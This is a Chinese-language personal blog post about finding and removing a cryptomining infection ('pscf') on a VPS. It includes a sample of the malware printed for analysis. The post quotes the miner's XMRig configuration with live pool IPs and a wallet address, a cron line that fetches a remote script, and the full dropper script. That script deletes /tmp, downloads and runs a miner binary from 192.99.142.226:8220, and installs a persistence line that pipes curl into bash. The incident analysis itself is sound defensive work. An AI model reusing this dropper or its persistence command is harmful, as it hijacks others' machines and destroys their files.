emmmm居然中了一次挖矿病毒pscf
发现
微皮艾斯最近不太能连上,时断时续,想重新部署一个顺便搭个梯子。
完成之后发现才几十k的速度,ping一下100多ms也还ok的呀,感觉不太对,top一下看到一个普通用户下一个pscf进程99%以上的占用,我嚓摊上事儿啦
解决1
直接kill进程,done。速度并没有什么变化,再top一下,嗯?pscf又跳出来了。
这时候还没觉得是病毒,考虑是不是一键搭梯子的时候是不是需要什么文件没有控制好死循环之类的。
lsof -c pscf查看到运行的文件看到一条/var/tmp/pscf -c /var/tmp/wc.conf
打开/var/tmp/pscf看到是一个编译过的执行文件,这文件干啥的也看不懂。
ls -al /var/tmp/查看一下发现时间不对呀,今天才搭梯子这pscf的文件日期是5天前呢。
继续看/var/tmp/wc.conf内容
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": 5, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "158.69.133.20:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "192.99.142.249:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "202.144.193.110:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}
虽然没见过挖矿病毒但是里面这写参数还有出现的几个miner,感觉中奖了。
继续查看/var/tmp/config.json 内容和wc.config一样
遂百度pscf,翻了几页都没有,百度挖矿病毒搜到的都是minerd之类的,解决方式就是删文件之类的,我这删了又生成啊。这时候又想到另一个办法。
解决2
既然还生成那我直接把运行读取那些权限去掉不就好了吗?
于是chmod 000 /var/tmp/pscf
kill 21414
top
嗯,有效果,过会再看f**k又跳出来pscf进程了,
ls -al /var/tmp/ 咦,这次又来一个pscf3,唉,果然是我太年轻了。
解决3
继续百度linux病毒之类的东西,突然发现有个说定时任务,嗯?感觉有可能。
crontab -l 提示此用户下没有定时任务,继续,查看 vi /etc/crontab 也没有定时任务,再找 vi /var/spool/cron/z 发现这个目录下面居然有个z开始用户的文件这个用户没有设置过定时任务呀,于是打开,果然发现了一条
* * * * * wget -q -O http://192.99.142.226:8220/cr.sh
然后wget http://192.99.142.226:8220/cr.sh下来看一下
#!/bin/bash
pkill -f /var/tmp/java
pkill -f /tmp/java
pkill -f zz.sh
pkill -f https
pkill -f 192.99.142.232
pkill -f 46.249.38.186
rm -rf /var/tmp/java
pkill -f 185.222.210.59
pkill -f ririg
rm -rf /tmp
rm -rf /var/tmp/j*
rm -rf /var/tmp/t*
rm -rf /tmp/t*
ps ax | grep /tmp/ | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf' | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
rm -rf /tmp/java
pkill -f pscc
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/pscf
pkill -f wo.conf
pkill -f gmr
rm -rf /var/tmp/java
rm -rf /var/tmp/ppc
DIR="/var/tmp"
if [ -a "/var/tmp/pscf" ]
then
if [ -w "/var/tmp/pscf" ] && [ ! -d "/var/tmp/pscf" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /var/tmp/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
;;
*)
echo "pscf wrong"
pkill -f wc.conf
pkill -f pscf
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/pscf" ]
then
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="192.99.142.226:8220"
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/pscf ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
;;
*)
echo "pscf wrong"
sizeBefore=$(du $DIR/pscf)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
#$WGET $DIR/pscf https://transfer.sh/wbl5H/pscf
download
sumAfter=$(md5sum $DIR/pscf | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/pscf` > $DIR/var/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/pscf3 | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
cp $DIR/pscf3 $DIR/pscf
;;
*)
echo "pscf wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/pscf http://192.99.142.226:8220/xm64
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "pscf OK"
cp $DIR/pscf $DIR/pscf3
;;
*)
echo "pscf wrong"
;;
esac
else
echo "No md5sum"
fi
}
if [ ! "$(ps -fe|grep '/var/tmp/pscf'|grep 'wc.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/pscf
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/pscf -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
if crontab -l | grep -q "192.99.142.226:8220"
then
echo "Cron exists"
else
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
pkill -f /var/tmp/java
pkill -f /var/tmp/java
pkill -f 192.99.142.232
chmod 777 /var/tmp/pscf
crontab -l | sed '/185.222.210.59/d' | crontab -
霍!没错就是你了,简单看一下就是下载文件,执行挖矿程序,加入定时任务,这么一看套路也很一般呀。
解决4
- vi /var/spool/cron/z** 删除定时任务保存文件;
- kill 21969 pscf进程;
- rm /var/tmp/pscf /var/tmp/wc.conf /var/tmp/config.json
继续top查看,没有出现pscf进程,cpu占用正常。
后记
虽然已经解决了占用的问题,执行文件也删除了,但是这个挖矿病毒的定时任务是如何加到系统里的,下一步还要继续查找问题。
百度的时候有人说可能有ssh留了后门之类的,我查看了.ssh/authorized_keys和/etc/ssh/sshd_config 并没有发现什么问题,明天继续观察一下。
干掉这个挖矿程序后梯子的速度一下就翻倍的上去了,开心。
顺手查了一下ip加拿大的,果然啊。
